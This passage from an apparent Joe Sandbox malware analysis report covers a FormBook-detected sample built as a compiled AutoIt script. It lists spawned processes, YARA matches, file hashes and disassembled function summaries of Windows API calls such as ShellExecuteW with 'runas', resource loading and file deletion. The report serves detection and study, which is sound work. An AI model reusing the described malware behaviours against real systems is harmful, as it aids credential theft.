Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3491866393.0000000003530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	22:50:19
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\ROUTE.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\ROUTE.EXE"
Imagebase:	0x10000
File size:	19'456 bytes
MD5 hash:	C563191ED28A926BCFDB1071374575F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3490916220.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	22:50:32
Start date:	10/12/2024
Path:	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe"
Imagebase:	0xd00000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	22:50:44
Start date:	10/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	9.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	34

Executed Functions

Function 00C63B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C63B68
IsDebuggerPresent.KERNEL32 ref: 00C63B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00D252F8,00D252E0,?,?), ref: 00C63BEB

Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06

Part of subcall function 00C7092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C63C14,00D252F8,?,?,?), ref: 00C7096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00C63C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00D17770,00000010), ref: 00C9D281
SetCurrentDirectoryW.KERNEL32(?,00D252F8,?,?,?), ref: 00C9D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D14260,00D252F8,?,?,?), ref: 00C9D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00C9D346

Part of subcall function 00C63A46: GetSysColorBrush.USER32(0000000F), ref: 00C63A50
Part of subcall function 00C63A46: LoadCursorW.USER32(00000000,00007F00), ref: 00C63A5F
Part of subcall function 00C63A46: LoadIconW.USER32(00000063), ref: 00C63A76
Part of subcall function 00C63A46: LoadIconW.USER32(000000A4), ref: 00C63A88
Part of subcall function 00C63A46: LoadIconW.USER32(000000A2), ref: 00C63A9A
Part of subcall function 00C63A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C63AC0
Part of subcall function 00C63A46: RegisterClassExW.USER32(?), ref: 00C63B16

Part of subcall function 00C639D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C63A03
Part of subcall function 00C639D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C63A24
Part of subcall function 00C639D5: ShowWindow.USER32(00000000,?,?), ref: 00C63A38
Part of subcall function 00C639D5: ShowWindow.USER32(00000000,?,?), ref: 00C63A41

Part of subcall function 00C6434A: _memset.LIBCMT ref: 00C64370
Part of subcall function 00C6434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C64415

Strings

runas, xrefs: 00C9D33A
This is a third-party compiled AutoIt script., xrefs: 00C9D279

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: b3233b43cfcab6c71039193856bf42acfbeaa3a98d2585823d65222a99d00aa5
Instruction ID: b3bd18f9576b09b933c2b5949edb6300674834d054f5e8a555333eec250ba9c9
Opcode Fuzzy Hash: b3233b43cfcab6c71039193856bf42acfbeaa3a98d2585823d65222a99d00aa5
Instruction Fuzzy Hash: B551E430908688FECF21EBB4EC85EFD7B74AF55714F104169F421A62A1CA705646DB35

Function 00C649A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00C649CD

Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06

GetCurrentProcess.KERNEL32(?,00CEFAEC,00000000,00000000,?), ref: 00C64A9A
IsWow64Process.KERNEL32(00000000), ref: 00C64AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C64AE7
FreeLibrary.KERNEL32(00000000), ref: 00C64AF2
GetSystemInfo.KERNEL32(00000000), ref: 00C64B23
GetSystemInfo.KERNEL32(00000000), ref: 00C64B2F

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: a300b6ff304b31f65ed32efa392262f9b3db2421dd174acdf055960b53b4548e
Instruction ID: 9ef8659decd11d35a572e3993fb310ede126278aa71d25f7642c42014551ef64
Opcode Fuzzy Hash: a300b6ff304b31f65ed32efa392262f9b3db2421dd174acdf055960b53b4548e
Instruction Fuzzy Hash: 5991E53198D7C0DECB35CBA885941AAFFF5AF29300B444DADD0DB97A42D220E648D76D

Function 00C64E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C64D8E,?,?,00000000,00000000), ref: 00C64E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C64D8E,?,?,00000000,00000000), ref: 00C64EB0
LoadResource.KERNEL32(?,00000000,?,?,00C64D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C64E2F), ref: 00C9D937
SizeofResource.KERNEL32(?,00000000,?,?,00C64D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C64E2F), ref: 00C9D94C
LockResource.KERNEL32(00C64D8E,?,?,00C64D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C64E2F,00000000), ref: 00C9D95F

Strings

SCRIPT, xrefs: 00C64EA6

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 92fbe36e859e63e8b1a927f84702bef180dc93986ca30d11466f0cab03b0c5bd
Instruction ID: 3a7977e65cf49319b0c4f46fd112a1cafe7805c2343a3adaedf2f70d16db1b38
Opcode Fuzzy Hash: 92fbe36e859e63e8b1a927f84702bef180dc93986ca30d11466f0cab03b0c5bd
Instruction Fuzzy Hash: 901191B1200341BFD7258B65EC88F2BBBB9FBC5711F10416CF5158A150DB61DC018660

Function 00C6FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: d4d7c7a3a77ed5aa7fe42e6a697aa95aaac9fc3d50c16308f39169780ff6cb7b
Instruction ID: 0daac02cf2b5991bb16dd824bf83742381b7667709ab22f256fde40716101eec
Opcode Fuzzy Hash: d4d7c7a3a77ed5aa7fe42e6a697aa95aaac9fc3d50c16308f39169780ff6cb7b
Instruction Fuzzy Hash: 7D925870608341DFD724DF24C480B2ABBE5BF85308F24896DE89A9B362D775ED45CB92

Function 00CC445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00C9E398), ref: 00CC446A
FindFirstFileW.KERNELBASE(?,?), ref: 00CC447B
FindClose.KERNEL32(00000000), ref: 00CC448B

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 7896bb44f8a72baa0412386a02a05280bffd2d70b7f56829e9612923661f9060
Instruction ID: 34a3f042a071e1a3a404d035a1606ec9390d8983f179afb575965d2f170d8b7a
Opcode Fuzzy Hash: 7896bb44f8a72baa0412386a02a05280bffd2d70b7f56829e9612923661f9060
Instruction Fuzzy Hash: 16E0D832810540674218AB38EC4DBED775C9E05335F20871DF935C50E0E7745D009595

Function 00C6E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00CA3E62

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 7ebbf615ae7de004d18bd112d06e1e0dc277b2a9cd9b0f10d3d803702f078d9b
Instruction ID: 2aa39c037969e27d9991b56c6b5a5845cb40ca0ce733eaed64e32f1749b96e60
Opcode Fuzzy Hash: 7ebbf615ae7de004d18bd112d06e1e0dc277b2a9cd9b0f10d3d803702f078d9b
Instruction Fuzzy Hash: C9A27B78A00215CFCB24CF99C4D0AAEB7B2FF59314F24806AE915AB351D771EE42DB91

Function 00C709D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C70A5B
timeGetTime.WINMM ref: 00C70D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C70E53
Sleep.KERNEL32(0000000A), ref: 00C70E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00C70EFA
DestroyWindow.USER32 ref: 00C70F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C70F20
Sleep.KERNEL32(0000000A,?,?), ref: 00CA4E83
TranslateMessage.USER32(?), ref: 00CA5C60
DispatchMessageW.USER32(?), ref: 00CA5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CA5C82

Strings

@GUI_CTRLID, xrefs: 00CA4F3A
@GUI_WINHANDLE, xrefs: 00CA4F8F
@GUI_CTRLHANDLE, xrefs: 00CA4FE4
@COM_EVENTOBJ, xrefs: 00CA54F0
@TRAY_ID, xrefs: 00CA578F

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 82f137c8bbb4188be0f32f34819a7799a85649329ba22f1fb9a10e24756ec2f4
Instruction ID: d0c28da9b998d5991793fa62370a551a4d83e7c8a5f5350954cace931b6eb82d
Opcode Fuzzy Hash: 82f137c8bbb4188be0f32f34819a7799a85649329ba22f1fb9a10e24756ec2f4
Instruction Fuzzy Hash: 4CB2CF70608742DFD724DF24C884BAEB7E4BF85308F24891DF499972A1CB71E985DB92

Function 00CC9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CC8F5F: __time64.LIBCMT ref: 00CC8F69

Part of subcall function 00C64EE5: _fseek.LIBCMT ref: 00C64EFD

__wsplitpath.LIBCMT ref: 00CC9234

Part of subcall function 00C840FB: __wsplitpath_helper.LIBCMT ref: 00C8413B

_wcscpy.LIBCMT ref: 00CC9247
_wcscat.LIBCMT ref: 00CC925A
__wsplitpath.LIBCMT ref: 00CC927F
_wcscat.LIBCMT ref: 00CC9295
_wcscat.LIBCMT ref: 00CC92A8

Part of subcall function 00CC8FA5: _memmove.LIBCMT ref: 00CC8FDE
Part of subcall function 00CC8FA5: _memmove.LIBCMT ref: 00CC8FED

_wcscmp.LIBCMT ref: 00CC91EF

Part of subcall function 00CC9734: _wcscmp.LIBCMT ref: 00CC9824
Part of subcall function 00CC9734: _wcscmp.LIBCMT ref: 00CC9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CC9452
_wcsncpy.LIBCMT ref: 00CC94C5
DeleteFileW.KERNEL32(?,?), ref: 00CC94FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CC9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CC9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CC9534

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 92788366156edf3c4b6a326f5aea733ff2e5e638a0580be70b9495bc14ac5581
Instruction ID: f4ace951b504c03a41615e5804026147296b976cf361ca492210fc4bf1c8ca33
Opcode Fuzzy Hash: 92788366156edf3c4b6a326f5aea733ff2e5e638a0580be70b9495bc14ac5581
Instruction Fuzzy Hash: C0C14AB1D00219AADF25DFA5CC85EDEBBBCEF45300F0044AAF609E7151EB309A859F65

Function 00C63015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C63074
RegisterClassExW.USER32(00000030), ref: 00C6309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C630AF
InitCommonControlsEx.COMCTL32(?), ref: 00C630CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C630DC
LoadIconW.USER32(000000A9), ref: 00C630F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C63101

Strings

0, xrefs: 00C63056
+, xrefs: 00C6305D
AutoIt v3 GUI, xrefs: 00C63090
TaskbarCreated, xrefs: 00C630A4

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5a0f134e8a908623cb682c439b9bfd0a94af9a73fc3b8c2182b2057f737b5086
Instruction ID: cb1a555031353ad84edb703a4890163b9b76e913f6c9328d87f94e0128ca59b5
Opcode Fuzzy Hash: 5a0f134e8a908623cb682c439b9bfd0a94af9a73fc3b8c2182b2057f737b5086
Instruction Fuzzy Hash: A33126B1841389AFDB60CFA4E885B9DBBF0FF19310F14452EE580EA2A0D7B94586CF51

Function 00C63041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C63074
RegisterClassExW.USER32(00000030), ref: 00C6309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C630AF
InitCommonControlsEx.COMCTL32(?), ref: 00C630CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C630DC
LoadIconW.USER32(000000A9), ref: 00C630F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C63101

Strings

0, xrefs: 00C63056
+, xrefs: 00C6305D
AutoIt v3 GUI, xrefs: 00C63090
TaskbarCreated, xrefs: 00C630A4

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: b8e01c0977814ae316340233e518fc1daa0cc72c783efb8a417c58c854f5fa8a
Instruction ID: 27d27415397cffc3387c164760da9f98871937a98e1a66e5be95f67c6da4ca79
Opcode Fuzzy Hash: b8e01c0977814ae316340233e518fc1daa0cc72c783efb8a417c58c854f5fa8a
Instruction Fuzzy Hash: 4821C5B1901758AFDB10DFA4E889B9DBBF4FB18710F00812AF911EA3A0D7B545468FA5

Function 00C6708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C64706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D252F8,?,00C637AE,?), ref: 00C64724

Part of subcall function 00C8050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C67165), ref: 00C8052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C671A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C9E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C9E909
RegCloseKey.ADVAPI32(?), ref: 00C9E947
_wcscat.LIBCMT ref: 00C9E9A0

Strings

Software\AutoIt v3\AutoIt, xrefs: 00C6719E
\Include\, xrefs: 00C67165
\, xrefs: 00C9E9C3
Include, xrefs: 00C9E8BF, 00C9E900

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 53e7d645e444194ac7306656f915cb12d774d2c9b830dc331ad3eda346f517fb
Instruction ID: fa7fc32c9873ae5aaf7ad033cab21aaab25f443b4b9ea943837936f32d6642ee
Opcode Fuzzy Hash: 53e7d645e444194ac7306656f915cb12d774d2c9b830dc331ad3eda346f517fb
Instruction Fuzzy Hash: A3719F71109301DEC720EF25E8859ABBBE8FFA4314F50092EF455C72A0DB71DA4ADB66

Function 00C63A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C63A50
LoadCursorW.USER32(00000000,00007F00), ref: 00C63A5F
LoadIconW.USER32(00000063), ref: 00C63A76
LoadIconW.USER32(000000A4), ref: 00C63A88
LoadIconW.USER32(000000A2), ref: 00C63A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C63AC0
RegisterClassExW.USER32(?), ref: 00C63B16

Part of subcall function 00C63041: GetSysColorBrush.USER32(0000000F), ref: 00C63074
Part of subcall function 00C63041: RegisterClassExW.USER32(00000030), ref: 00C6309E
Part of subcall function 00C63041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C630AF
Part of subcall function 00C63041: InitCommonControlsEx.COMCTL32(?), ref: 00C630CC
Part of subcall function 00C63041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C630DC
Part of subcall function 00C63041: LoadIconW.USER32(000000A9), ref: 00C630F2
Part of subcall function 00C63041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C63101

Strings

0, xrefs: 00C63AF4
#, xrefs: 00C63AFB
AutoIt v3, xrefs: 00C63B05

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 7d67ddf34c2dcba83e40f83fdd70fa77ad9fe29717ef062755188d65179dc766
